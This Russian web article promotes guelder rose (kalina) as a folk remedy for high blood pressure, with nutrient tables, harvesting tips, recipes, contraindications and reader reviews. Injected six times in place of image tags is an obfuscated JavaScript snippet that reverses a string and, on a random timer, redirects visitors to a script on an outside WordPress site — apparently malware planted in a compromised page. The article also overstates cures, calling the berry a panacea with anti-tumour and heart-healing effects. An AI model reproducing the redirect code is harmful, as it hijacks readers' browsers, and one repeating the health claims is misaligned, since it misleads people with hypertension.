Калина обыкновенная: чудо-средство от повышенного давления

Год за годом изматывающий темп жизни понемногу ослабляет наше здоровье, истончает силы. Поначалу его влияние незаметно, но со временем организм сдаётся. И когда давление крови сдавливает виски и затылок тупой болью, а сердце яростно колотится в груди, мы лихорадочно ищем исцеления. Некую панацею, которая уже давным-давно была создана природой. Настоящая кладовая здоровья — это калина, алеющая гроздьями ягод в ближайшем лесу.

Состав и лечебные свойства калины

Калина обыкновенная, или красная — необычайно ценное растение, все надземные части которого обладают целебными свойствами. Достаточно вспомнить лишь то, что в столовой ложке её свежих ягод содержится количество витамина С, равное суточной дозе для взрослого человека.

Таблица: полезные вещества, содержащиеся в калине

Вещество Биологическая роль Где содержится
Группа Название
Витамины A
  • Укрепляет зрение;
  • участвует в образовании:
    • мышц;
    • костей;
    • хрящей;
    • эпителия;
    • половых гормонов;
    • ферментов печени
Ягоды
C
  • Сильный антиоксидант;
  • укрепляет стенки сосудов;
  • обладает противовирусным и антибактериальным воздействием;
  • принимает участие в реакциях печёночной детоксикации;
  • регулирует обмен железа в организме
Ягоды, содержание на 70% больше, чем в мякоти лимона
E
  • Регулирует потребление кислорода тканями;
  • восстанавливает повреждённые клеточные мембраны;
  • важен для синтеза ДНК, коллагена, мышечных волокон
Ягоды
K Принимает участие в синтезе костной ткани и факторов свёртываемости крови
P
  • Нормализует проницаемость сосудов;
  • регулирует свёртываемость крови
Минералы Железо Важнейший компонент гемоглобина
Йод Необходим для синтеза гормонов щитовидной железы
Магний
  • Нормализует деятельность нервной системы;
  • участвует в процессах сокращения мышц, тканевого обмена, энергетических реакциях
Марганец
  • Регулирует процессы роста;
  • принимает участие в синтезе половых гормонов;
  • важен для нормального кроветворения;
  • стабилизирует деятельность нервной системы
Медь Компонент пищеварительных и транспортных ферментов
Селен
  • Участвует в окислительно-восстановительных реакциях;
  • оказывает антиоксидантное воздействие;
  • регулирует усвояемость йода и его связывание тканями щитовидной железы;
  • обладает антивирусным эффектом
Фосфор Принимает участие в формировании костей
Хром Регулирует обмен жиров и углеводов
Цинк Содержится примерно в четырёх сотнях ферментов, вследствие чего принимает участие в процессах:
  • клеточного дыхания;
  • восстановления мембран;
  • синтеза белков и ДНК;
  • расщепления токсинов
Сложные вещества Валериановая кислота Обладает лёгким, но стабильным седативным воздействием
Кумарины
  • Снимают мышечные спазмы;
  • оказывают противоопухолевое воздействие
Пектины
  • Стимулируют процессы пищеварения;
  • удаляют из желудочно-кишечного тракта продукты гниения и токсины
Танины
  • Оказывают кровоостанавливающее действие;
  • выводят соли тяжёлых металлов;
  • подавляют воспалительные процессы
Вибурнин Участвует в процессах свёртывания крови Кора, листья и ягоды
Дубильные вещества
  • Связывают и выводят токсины, соли тяжёлых металлов, радиоактивные элементы;
  • укрепляют стенки сосудов;
  • повышают усвояемость витамина С
Кора и листья
Мирициловый спирт Участвует в восстановлении клеточных мембран
Карбоновые кислоты Оказывают бактерицидное воздействие
Фитостерин Вещество, по структуре подобное стероидам.
  • Проявляет антиоксидантную активность;
  • нормализует жировой обмен;
    снижает уровень холестерина
Флобафен Краситель, оказывающий лёгкий антибактериальный эффект

Как можно судить по перечисленным свойствам, народные средства из калины способны оказать огромную помощь при лечении различных патологий:

  • нервное перенапряжение;
  • нарушения обмена веществ:
    • авитаминоз и гиповитаминоз;
    • анемия;
    • сахарный диабет;
    • ожирение;
    • отравления;
  • воспалительные заболевания:
  • болезни дыхательной системы:
    • бронхиальная астма
    • ОРВИ.

Особенно сильным является влияние калины на кровеносную систему человека, в частности — при борьбе с повышенным давлением. Укрепление стенок сосудов и снятие спазмов мышечных оболочек положительно сказывается на их тонусе. Освобождение просвета от холестериновых бляшек также благотворно воздействует на состояние организма. Усиленный эффект достигается в том случае, если состояние гипертензии развилось под влиянием стресса. Валериановая кислота, содержащаяся в ягодах калины, воздействует успокаивающе на нервную систему, снижая интенсивность сердечно-сосудистых проявлений. Седативный эффект усиливается под воздействием соединений марганца.

Жидкость, скапливающаяся в тканях и избыточно циркулирующая в сосудах, также является одной из причин гипертензии. Мочегонное действие ионов магния ускоряет выведение почками излишков воды. Таким образом, эффект понижения артериального давления при употреблении средств из калины является разносторонним, ощутимым и стабильным.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/06/kalina-obyknovennaya-728×546.jpg» alt=»Калина обыкновенная понижает или повышает давление» width=»728″ height=»546″ /> Целебные вещества содержатся во всех надземных частях растения

Особенности заготовки и хранения

Чтобы сохранить максимальное количество целебных компонентов, содержащихся в калине, при заготовке растительного сырья нужно следовать нескольким простым правилам. Сбор лучше выполнять в незагрязненных местах, удалённых от трасс и химических предприятий. Для каждого из видов сырья есть свой заготовительный сезон.

Таблица: время заготовки растительного материала

Часть растения Время заготовления
Побеги Март — апрель
Кора Апрель
Цветки Май — июнь
Ягоды Сентябрь — ноябрь

Свежие плоды пригодны для немедленного использования, но всё же их лучше подвергнуть быстрому охлаждению в морозильной камере. Эта процедура не только обеспечит лучшую сохранность полезных компонентов, но и частично избавит ягоды от горечи. Приготовленные для сушки плоды следует промыть, избавить от плодоножек, после чего провялить несколько дней на открытом воздухе. От остатков влаги сырьё избавляется в духовке при температуре +50–60℃. Высушенные плоды желательно хранить в тканевых мешках небольшого объёма. Аналогичным образом производится сушка остальных частей растения.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/06/sushenaya-kalina-728×554.jpg» alt=»Сушеная калина» width=»728″ height=»554″ /> Правильная сушка позволяет сохранить все полезные свойства ягод калины

Рецепты народных средств для снижения давления

Средства из калины могут применяться во множестве лекарственных форм. Их разнообразие начинается свежевыжатым соком, применяемым при авитаминозах, и заканчивается сложными травяными сборами. Для терапии сердечно-сосудистых заболеваний принято использовать настои, отвары, спиртовые экстракты и смеси. Полезными свойствами обладают также напитки для ежедневного употребления.

Настой

Простейшей лекарственной формой, которую можно получить из калины, является ягодный настой. Достаточно 3–4 ст. л. свежих или высушенных плодов залить стаканом кипятка, настоять 4 часа и отфильтровать. Суточная порция употребляемого настоя составляет 3 стакана.

Отвары

Отвары позволяют извлечь из сырья больше ценных веществ, из-за чего и обладают сильным воздействием на организм. Процесс обработки ягод состоит из следующих стадий:

  1. Растирания плодов до состояния кашицы.
  2. Добавления кипятка. На каждые 2 ст. л. ягод необходимо взять 1 стакан жидкости.
  3. Томления на водяной бане (15 минут).
  4. Охлаждения.
  5. Процеживания.

Готовое средство нужно хранить в холодильнике, принимая по трети стакана трижды в день, за полчаса до еды.

Молодые побеги калины также пригодны для производства отвара. Если смешать их с равными количествами травы пустырника и корня валерианы, залить кипятком (1 стакан на 2 ст. л. смеси), после чего томить 5 минут на слабом огне — получится отличное средство от гипертонии. Режим приёма совпадает с описанным выше.

Смесь из калиновой коры, травы ромашки лекарственной и мелиссы — мощное средство против вегетососудистой дистонии, гипертонии, нервного перенапряжения. Следует соединить компоненты в равных пропорциях, а полученный состав залить кипятком (1 стакан на 3 ст. л. смеси). После получасового томления на водяной бане отвар процеживают и охлаждают. Учитывая высокую концентрацию активных веществ в использованном сырье, средство необходимо принимать по 1–2 ст. л. перед сном на протяжении 1–2 недель.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/06/kora-i-pobegi-kaliny.jpg» alt=»Кора и побеги калины» width=»700″ height=»660″ /> Древесные части калины содержат большое количество активных веществ

Настойка

Лёгкие биологически активные вещества (валериановая кислота, эфиры, танины, фитостерин) легко экстрагируются спиртом. Полученные таким способом средства отличаются от составов на водной основе длительностью хранения, быстрой усвояемостью и сильным воздействием на системы организма.

Спиртовая настойка из ягод получается при смешивании 1 кг крупных и целых плодов калины с 1 л. качественной водки. После настаивания в тёмном тёплом месте на протяжении 1–2 месяцев средство пригодно к употреблению. Принимать его нужно по 1 ст. л. трижды в день, за полчаса до еды. Кору и молодые побеги калины также можно использовать как сырьё для настойки, но дозировку конечного продукта в этом случае следует уменьшить до 1 ч. л. перед сном.

Смеси

Сахаристые вещества, используемые при обработке и хранении ягод калины, способствуют скорейшему выходу ценных минералов и органических веществ из растительных тканей. Кроме того, концентрированные углеводы выступают в качестве естественного консерванта.

С железом, магнием, марганцем и прочими металлами сахара образуют лёгкие соединения — сахараты. В такой форме усвояемость минералов человеческим организмом резко возрастает.

Наиболее часто для сохранения ягод калины используется сахар. Предварительно вымытые и высушенные плоды бережно отжимаются. Полученный сок смешивается с сахаром в равных пропорциях, помещается в стеклянную посуду и держится в холодильнике. Создаваемая с целью длительного хранения смесь готовится по иному рецепту — 200 г. сахара растворяется в 1 л. сока. Полученная жидкость томится на водяной бане 10–15 минут, при этом её постоянно помешивают. Горячую смесь разливают в чистые банки.

Полезные свойства мёда и его преимущества над сахаром описаны давно. При использовании этого продукта пчеловодства в качестве компонента смесей против сердечно-сосудистых заболеваний на передний план выступает ещё один немаловажный фактор: его составляющие отлично дополняют и усиливают воздействие веществ, содержащихся в соке калины. Именно поэтому составы на медовой основе отличаются от прочих более сильным и устойчивым целебным воздействием. Простая медовая смесь получается при смешивании 40 граммов тёртых плодов калины с 200 мл подогретого до +50℃ жидкого мёда. После суточного настаивания в тёплом, закрытом от света месте средство нужно хранить в холодильнике, принимая по 1 ст. л. трижды в день после еды.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/06/kalina-s-medom-728×455.jpg» alt=»Калина с мёдом» width=»728″ height=»455″ /> Медовые смеси калины эффективны при гипертонии

Существует смесь, употребление которой благотворно воздействует на сердечно-сосудистую, иммунную, нервную, эндокринную и пищеварительную системы. В её состав входят:

  • 1 лимон в кожуре;
  • 100 г. ягод калины;
  • 200 г. листьев алоэ;
  • 200 г. ядер грецких орехов;
  • 200 г. сливочного масла;
  • 200 г. мёда.

Компоненты пропускаются через мясорубку и тщательно перемешиваются. Готовая смесь хранится в холодильнике, принимать её следует по 1 ст. л. через час после еды.

Видео: калина с мёдом — средство от гипертонии

Напитки

Простейшим напитком из калины, сохраняющим все полезные свойства этого растения, является чай. Для его приготовления 1 ст. л. сухих ягод и 1 ст. л. листьев калины заливается 0,5 л воды, после чего доводится до кипения. При ежедневном употреблении чай нормализует артериальное давление, снижает отёчность, избавляет от проявлений вегетососудистой дистонии. Из перетёртых с сахаром ягод получаются бодрящие морсы.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/06/kalinovyy-chay-728×546.jpg» alt=»Калиновый чай» width=»728″ height=»546″ /> Чай из калины полезен и прост в приготовлении

Калиновый квас — действенное сосудорасширяющее средство. Напиток готовится из свежих плодов калины и корня свёклы. По 300 г каждого компонента нужно перетереть в кашицу, поместить в отдельную посуду и томить на водяной бане 5–7 минут, постоянно помешивая. Полученные отвары равномерно смешать, добавить 1/3–1/2 стакана сахара, повторно прокипятить. Готовый напиток профильтровать и хранить в холодильнике.

Видео: морс из калины

Противопоказания и побочные эффекты

Учитывая высокое содержание в ягодах и коре калины стимуляторов свёртывания крови (вибурнин, витамин К, танины), препараты из неё противопоказаны беременным женщинам и больным со склонностью к образованию тромбов.

Резкое снижение артериального давления способно спровоцировать слабость и обмороки у гипотоников. Усиление секреции желудочного сока может усугубить течение гастрита и язвенных заболеваний. Активизация почечной деятельности представляет определённую опасность для пациентов с тяжёлыми формами:

  • артрита;
  • мочекаменной болезни;
  • нефрозов;
  • подагры.

Сильное воздействие препаратов калины на организм человека — весомый повод проконсультироваться у врача перед началом их применения.

Отзывы

Полезная ягода, и растёт на даче, в Ленинградской области. Витаминная, растёт в северных широтах. Родственники выращивают её, а потом сушат. Хорошо помогает как общеукрепляющее и поддерживающее средство, также незаменимо при высоком давлении и кашле. Мы храним калину прямо на ветках, но можно её и замораживать. Ягода — с семечком, немного горьковатая. Для улучшения эффекта и вкуса можно добавлять к ней мёд. Я обычно давлю её толкушкой и завариваю как чай, стараюсь пить в течение всего дня. Поначалу она меня не вдохновила из-за вкуса и семечек, но повзрослев, я оценила её свойства и пользу.

Полина

http://irecommend.ru/content/yagoda-ne-trebuyushchaya-slozhnogo-ukhoda-i-s-oshchutimoi-polzoi

Многие не являются поклонниками этих красных ягодок, а зря. Вот как делаю я: где-то в октябре — ноябре, когда ягоды созреют их можно уже собирать. Конечно, если их оставить на кусте, то можно полакомиться ими и зимой, но я обычно собираю их поздней осенью. Далее мою собранные кисти ягод, и вручную протираю ягоды сквозь мелкое сито. Делается это из-за того, что у ягод внутри очень большая плоская косточка, которая нам совсем не нужна. Потом взвешиваю полученную массу и смешиваю с мёдом в пропорции 1:1. После чего следует оставить все это «дело» в открытой кастрюльке на 9–10 дней. Это нужно для того, чтобы постепенно ушёл не очень приятный запах. А потом разливаю по баночкам, и в холодильник.

vergo

http://irecommend.ru/content/ne-tolko-krasiva-no-i-ochen-polezna

Целебные свойства калины позволяют излечить не только лёгкую простуду, но и затронутое болезнью сердце. Достаточно приложить лишь толику знаний, немного усердия в соблюдении распорядка, а также бережное отношение к собственному телу — и скромное растение поможет вам вернуть утраченное здоровье.

Adblock
detector